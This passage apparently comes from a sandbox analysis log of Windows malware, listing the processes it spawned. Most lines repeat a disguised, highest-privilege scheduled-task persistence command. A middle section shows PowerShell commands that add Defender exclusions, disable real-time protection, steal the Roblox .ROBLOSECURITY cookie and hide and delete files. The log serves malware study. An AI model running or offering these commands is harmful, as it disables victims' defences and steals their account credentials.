C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3700
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4708
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4304
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4548
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3612
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2572
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3144
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3960
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:628
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3080
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1684
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4896
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:5008
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2476
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:212
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2388
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3844
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1532
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5072
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:704
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1416
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"' & exit2⤵PID:3040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3452 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\play.vbs"5⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4344
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:8
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2796
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1044
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2140
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2580
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1980
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3700
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4944
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1316
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1528
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3268
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2728
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"' & exit2⤵PID:2264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3464 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"5⤵
- Views/modifies file attributes
PID:740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
- Loads dropped DLL
PID:3900
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:2980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:644
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:3176
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe" && pause5⤵PID:4852
-
C:\Windows\system32\PING.EXEping localhost6⤵
- Runs ping.exe
PID:1408
-
-
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2580
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4832
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1576
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3496
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4584
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2956
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1564
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4888
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4600
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3132
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:852
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:404
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2252
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4764
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4468
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3144
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3956
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1388
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4136
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3820
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:628
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1576
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3508
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4784
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4428
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3980
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2376
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1832
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2432
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:440
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2444
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4616
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2956
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4060
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1020
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3128
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2160
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2376
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4136
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3620
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1812
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2444
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4284
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:212
-
